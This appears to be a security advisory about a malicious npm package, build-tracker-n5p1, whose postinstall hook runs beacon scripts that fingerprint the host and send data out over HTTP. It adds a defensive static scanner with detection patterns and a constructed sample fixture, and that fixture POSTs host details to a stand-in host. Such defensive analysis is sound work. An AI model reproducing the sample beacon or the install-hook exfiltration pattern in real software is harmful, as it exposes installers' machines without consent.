
MAL-2026-6196

Malicious code in build-tracker-n5p1 (npm)

Details


## Source: amazon-inspector (e731775fde27ad6db493d20397b27eee9b4a6ea0bf515f9516cc974ea3e12619)

Package name suggests build telemetry tooling, but the tarball ships beacon scripts (beacon18.js, beacon_linux.js) wired to a postinstall lifecycle hook ("postinstall": "node run.js" in package.json line 9). On install, these scripts collect host identifiers via os.hostname()/os.platform() and child_process, then issue outbound HTTP GET/POST requests via http.request from the installer's machine. This combination — auto-execute on install, host fingerprinting, and outbound HTTP exfiltration — is a classic install-time host beacon / data-exfiltration pattern. There is no legitimate build-tracking reason to fingerprint the host and beacon out at install time without consent or configuration.
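The three indicators named above (an install-time lifecycle hook, host fingerprinting, and outbound HTTP) can be triaged statically before a dependency is ever installed. The following is an added example, not code from the advisory or the package: it walks a package.json plus the files the hook's entry script requires, and flags the combination. The package contents and the `example.invalid` host are constructed stand-ins.

```javascript
// Added example (not the advisory's or the package's code): a static
// triage check for the install-time beacon pattern described above.
// Inputs are constructed in-memory stand-ins for a tarball's files.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];
const FINGERPRINT = /\bos\.(hostname|platform|userInfo|networkInterfaces)\s*\(|require\(['"]child_process['"]\)/;
const NETWORK = /\b(https?)\.(request|get)\s*\(|fetch\s*\(/;

// Follow local require('./x') chains from the hook's entry script.
function collectSources(files, entry, seen = new Set()) {
  const name = entry.replace(/^\.\//, '').replace(/\.js$/, '') + '.js';
  if (seen.has(name) || !(name in files)) return seen;
  seen.add(name);
  for (const m of files[name].matchAll(/require\(['"](\.\/[^'"]+)['"]\)/g)) {
    collectSources(files, m[1], seen);
  }
  return seen;
}

// Returns one finding per install-time hook; 'install-time beacon' only when
// the reachable code both fingerprints the host and talks to the network.
function scanPackage(pkg, files) {
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = pkg.scripts && pkg.scripts[hook];
    if (!cmd) continue;
    const m = /^node\s+(\S+)/.exec(cmd); // "node run.js" -> run.js
    const sources = m ? [...collectSources(files, m[1])] : [];
    const code = sources.map(f => files[f]).join('\n');
    const fingerprints = FINGERPRINT.test(code);
    const network = NETWORK.test(code);
    findings.push({
      hook, command: cmd, files: sources, fingerprints, network,
      verdict: fingerprints && network ? 'install-time beacon' : 'review',
    });
  }
  return findings;
}

// Constructed sample modelled on the indicators listed in the advisory.
const SAMPLE_PKG = { name: 'example-pkg', scripts: { postinstall: 'node run.js' } };
const SAMPLE_FILES = {
  'run.js': "require('./beacon18.js');\n",
  'beacon18.js': "const os = require('os');\n" +
    "const { execSync } = require('child_process');\n" +
    "const http = require('http');\n" +
    "const body = JSON.stringify({ h: os.hostname(), p: os.platform() });\n" +
    "http.request({ method: 'POST', host: 'example.invalid' }).end(body);\n",
};

console.log(JSON.stringify(scanPackage(SAMPLE_PKG, SAMPLE_FILES), null, 2));
```

Any hook at all yields a 'review' finding, since a lifecycle script that runs arbitrary code deserves a look even when these particular APIs are absent.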


Affected packages

npm / build-tracker-n5p1

No fixed version published yet for build-tracker-n5p1 (npm). Pin to a known-safe version or switch to an alternative.
